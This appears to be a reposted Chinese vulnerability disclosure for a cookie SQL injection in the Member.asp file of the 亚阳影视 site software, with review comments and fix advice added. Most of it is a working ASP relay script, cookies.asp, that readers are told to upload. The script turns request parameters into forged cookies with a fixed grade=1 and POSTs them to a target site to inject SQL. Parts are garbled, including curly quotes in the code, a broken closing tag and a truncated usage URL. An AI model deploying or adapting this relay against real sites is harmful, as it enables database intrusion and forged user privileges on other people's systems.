BY:Xiao.K@secdst.net
文章出自:http://blog.sadk.org
涉及版本: 全版本
漏洞文件:
Member.asp
漏洞描述:
################################################################
' Logout branch quoted from Member.asp. When the "action" value is "exit" it
' looks up the member row whose 用户名 column equals the "username" cookie,
' writes a log entry, marks the row offline, blanks three cookies and then
' redirects to the Referer header.
' Rq, conn and write_userlog are defined outside this excerpt.
if Rq(”action”)=”exit” then
set rs=server.createobject(”adodb.recordset”)
' VULNERABLE: the cookie value is concatenated into the SQL text between
' single quotes with no validation or escaping. Cookies are fully controlled
' by the client, so this statement can be altered by whoever sends the request.
' Mitigation: build the query with an ADODB.Command and a bound parameter
' (CreateParameter / Parameters.Append) and open the recordset from that
' command, and identify the current user from server-side session state
' rather than from a cookie.
sql=”select * from 会员 where 用户名=’”&Request.cookies(”username”)&”‘”
' 1 and 3 are the ADO values for adOpenKeyset and adLockOptimistic, i.e. an
' updatable cursor, which the rs.update call below relies on.
rs.open sql,conn,1,3
if not rs.EOF then
' NOTE(review): the same unvalidated cookie value is handed to write_userlog,
' which is not shown here - confirm it does not also build SQL from it.
call write_userlog(Request.cookies(”username”),”日志”,”退出登陆”,”0″,”0″)
rs(”在线状态”)=”否”
rs.update
' NOTE(review): userid, username and grade presumably carry the login state.
' If other pages read the member's grade or id from these cookies, that is
' client-chosen data as well - verify against the rest of the application.
Response.cookies(”userid”)=”"
Response.cookies(”username”)=”"
Response.cookies(”grade”)=”"
end if
' The redirect target is the client-supplied Referer header, taken as is.
' It may be empty or point to another site; prefer a fixed local path or
' check that the target is on this host before redirecting.
Response.redirect request.servervariables(”HTTP_REFERER”)
end if
################################################################
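Request.cookies("username") 的值未经任何过滤就直接拼接进 SQL 语句,导致 cookie 注入。修复建议:该查询改用参数化查询(ADODB.Command 绑定参数),并以服务器端会话而不是客户端 cookie 来确定当前用户。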
把以下代码保存为cookies.asp,并且上传到支持asp的空间,
亚阳影视全版本注入漏洞0806[member.asp]
。################################################################
Usage:
http://blog.sadk.org/temp/03/jmc ... 5&user=bnzm5270
###########################################################
<%
' Relay page: reads the "user", "id" and "url" request values, places the
' first two into a Cookie header and sends a server-side POST to
' http://<url>/member/src_1.asp, then writes the response body back to the
' caller. In effect it turns request parameters into cookies.
'
' What the receiving server sees (useful when reviewing logs): a POST with an
' empty body, a Referer identical to the requested URL, and a Cookie header of
' the form "grade=1;userid=...;username=..." whose values are escape()-encoded.
' The request originates from the host running this page, not from the
' original client. Any matching on the Cookie header should decode
' percent-encoding first.
'
' NOTE(review): "url" is used unvalidated as the request host and the response
' is echoed unencoded, so wherever this page is hosted it acts as an open
' request relay for anyone who can reach it.
username=request("user") 'value placed in the "username" cookie
id=request("id") 'value placed in the "userid" cookie
url=request("url") 'host part of the request URL
username=escape(username)
id=escape(id)
JMUrl="http://"&url&"/member/src_1.asp"
' The Referer is set to the same URL as the request target.
JmRef="http://"&url&"/member/src_1.asp"
' grade is fixed to 1; userid and username come from the request.
jmcok="grade=1;userid=" & id &";username="&username&";"
' Self-assignment with no effect: VBScript names are case-insensitive, so
' jmcok and JmCok are the same variable.
JmCok=JmCok
JmCok=URLEncoding(JmCok)
' Empty POST body.
JmStr=""
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
    ' Sends PostStr to PostUrl as a synchronous, form-encoded POST through
    ' msxml2.serverXMLHTTP and returns the response body as a string.
    '   PostUrl - request URL
    '   PostStr - request body
    '   PostCok - value sent in the Cookie header
    '   PostRef - value sent in the Referer header
    ' Content-Length is set from Len(PostStr), which is a character count.
    ' No status check or error handling is done: whatever body comes back is
    ' decoded with bytes2BSTR and returned.
    Dim xhr, rawBody
    Set xhr = Server.CreateObject("msxml2.serverXMLHTTP")
    ' Third argument False = synchronous call; Send blocks until completion.
    xhr.Open "POST", PostUrl, False
    xhr.SetRequestHeader "Content-Length", Len(PostStr)
    xhr.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    xhr.SetRequestHeader "Referer", PostRef
    xhr.SetRequestHeader "Cookie", PostCok
    xhr.Send PostStr
    rawBody = xhr.ResponseBody
    ' Release the HTTP object before converting the raw bytes.
    Set xhr = Nothing
    PostData = bytes2BSTR(rawBody)
End Function
Function bytes2BSTR(vIn)
    ' Converts a byte string / byte array into a VBScript string.
    ' Bytes below &H80 become one character each. A byte of &H80 or above is
    ' combined with the byte that follows it into one 16-bit code
    ' (lead * &H100 + trail), which is passed to Chr().
    ' If the input ends on a lead byte there is no following byte and
    ' AscB fails on the empty result.
    Dim text, pos, total, lead, trail
    text = ""
    total = LenB(vIn)
    pos = 1
    Do While pos <= total
        lead = AscB(MidB(vIn, pos, 1))
        If lead >= &H80 Then
            ' Two-byte character: consume the lead byte and its trail byte.
            trail = AscB(MidB(vIn, pos + 1, 1))
            text = text & Chr(CLng(lead) * &H100 + CInt(trail))
            pos = pos + 2
        Else
            text = text & Chr(lead)
            pos = pos + 1
        End If
    Loop
    bytes2BSTR = text
End Function
' Returns vstrin with every character whose Abs(Asc()) is below &HFF copied
' unchanged, and every other character written as two "%XX" groups taken from
' the high and low parts of its 16-bit code. Characters such as ";" and "="
' therefore pass through as they are.
' Only i is declared here; strReturn, ThisChr, InnerCode, Hight1 and Low1 are
' not Dim'd, so unless they are declared elsewhere they are script-level
' variables that outlive the call.
Function URLEncoding(vstrin)
strReturn=""
Dim i
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
' A negative code is shifted into the 0..&HFFFF range.
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
' NOTE(review): the high part is obtained by integer division by &HFF (255),
' not &H100 (256) - confirm this is intended.
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
' Hex() does not zero-pad, so a part below &H10 yields a single hex digit.
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function
% >
#################################################################